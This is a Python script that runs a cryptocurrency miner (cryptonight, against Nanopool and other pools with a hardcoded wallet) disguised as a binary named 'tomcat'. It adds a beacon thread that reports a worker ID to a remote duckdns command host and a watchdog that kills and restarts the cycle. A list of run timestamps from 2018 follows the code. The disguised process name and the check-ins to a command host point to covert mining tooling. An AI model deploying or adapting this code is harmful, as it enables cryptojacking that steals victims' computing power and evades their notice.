import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:12:01.379152
#2018-02-17 15:57:05.211478
#2018-02-17 17:46:01.507334
#2018-02-17 19:35:01.757250
#2018-02-17 21:25:03.944766
#2018-02-17 23:09:03.920057
#2018-02-18 00:56:07.441827
#2018-02-18 02:44:07.351931
#2018-02-18 04:33:06.787978
#2018-02-18 06:25:09.129643
#2018-02-18 08:14:07.936025
#2018-02-18 10:02:05.160624
#2018-02-18 11:48:07.802319
#2018-02-18 13:33:06.961600
#2018-02-18 15:22:03.090103
#2018-02-18 17:10:09.272786
#2018-02-18 18:59:06.455158
#2018-02-18 20:46:06.817895
#2018-02-18 22:31:01.910943
#2018-02-19 00:19:04.917100
#2018-02-19 02:05:07.609829
#2018-02-19 03:53:03.871711
#2018-02-19 05:37:07.431268
#2018-02-19 07:24:02.064662
#2018-02-19 09:14:04.948461
#2018-02-19 11:03:06.339385
#2018-02-19 12:49:04.896046
#2018-02-19 14:36:08.334890
#2018-02-19 16:23:08.307500
#2018-02-19 18:10:07.738460
#2018-02-19 19:56:05.643656
#2018-02-19 21:43:05.289991
#2018-02-19 23:29:05.666491
#2018-02-20 01:16:07.013858
#2018-02-20 03:08:01.572245
#2018-02-20 04:55:08.321143
#2018-02-20 06:38:03.921450
#2018-02-20 08:23:07.828964
#2018-02-20 10:08:05.994088
#2018-02-20 11:52:09.750169
#2018-02-20 13:41:01.845827
#2018-02-20 15:25:07.974751
#2018-02-20 17:10:10.934790
#2018-02-20 19:01:01.486672
#2018-02-20 20:49:05.474556
#2018-02-20 22:33:03.717121
#2018-02-21 00:15:04.317139
#2018-02-21 02:03:05.903662
#2018-02-21 03:50:02.076307
#2018-02-21 05:38:05.142052
#2018-02-21 07:26:10.140535
#2018-02-21 09:11:01.714449
#2018-02-21 10:59:04.889280
#2018-02-21 12:45:11.680859
#2018-02-21 14:33:01.645928
#2018-02-21 16:19:08.527485
#2018-02-21 18:11:09.007795
#2018-02-21 19:57:01.364916
#2018-02-21 21:43:08.251649
#2018-02-21 23:31:05.503739
#2018-02-22 01:18:07.425113
#2018-02-22 03:07:04.153688
#2018-02-22 04:51:07.447692
#2018-02-22 06:36:05.474799
#2018-02-22 08:24:07.216297
#2018-02-22 10:12:05.042557
#2018-02-22 11:56:07.463660
#2018-02-22 13:42:09.463135
#2018-02-22 15:32:04.789103
#2018-02-22 17:18:07.735489
#2018-02-22 19:05:01.621234
#2018-02-22 20:56:08.441021
#2018-02-22 22:43:01.871568
#2018-02-23 00:31:05.291953
#2018-02-23 02:18:08.224554
#2018-02-23 04:07:07.350396
#2018-02-23 05:50:04.020866
#2018-02-23 07:38:02.226947
#2018-02-23 09:40:11.996318
#2018-02-23 11:44:06.530172
#2018-02-23 13:35:04.063582
#2018-02-23 15:21:04.560582
#2018-02-23 17:09:11.119315
#2018-02-23 18:54:07.987219
#2018-02-23 20:39:07.014296
#2018-02-23 22:25:07.010343
#2018-02-24 00:10:05.702841
#2018-02-24 02:03:03.883330
#2018-02-24 03:54:04.603909
#2018-02-24 05:41:06.762406
#2018-02-24 07:32:05.539562
#2018-02-24 09:19:01.647790
#2018-02-24 11:08:03.736462
#2018-02-24 12:56:07.317699
#2018-02-24 14:44:01.781555
#2018-02-24 16:36:06.965914
#2018-02-24 18:24:07.696753
#2018-02-24 20:12:07.788994
#2018-02-24 21:57:07.031691
#2018-02-25 02:35:07.061779
#2018-02-25 06:17:01.976617
#2018-02-25 11:40:06.625043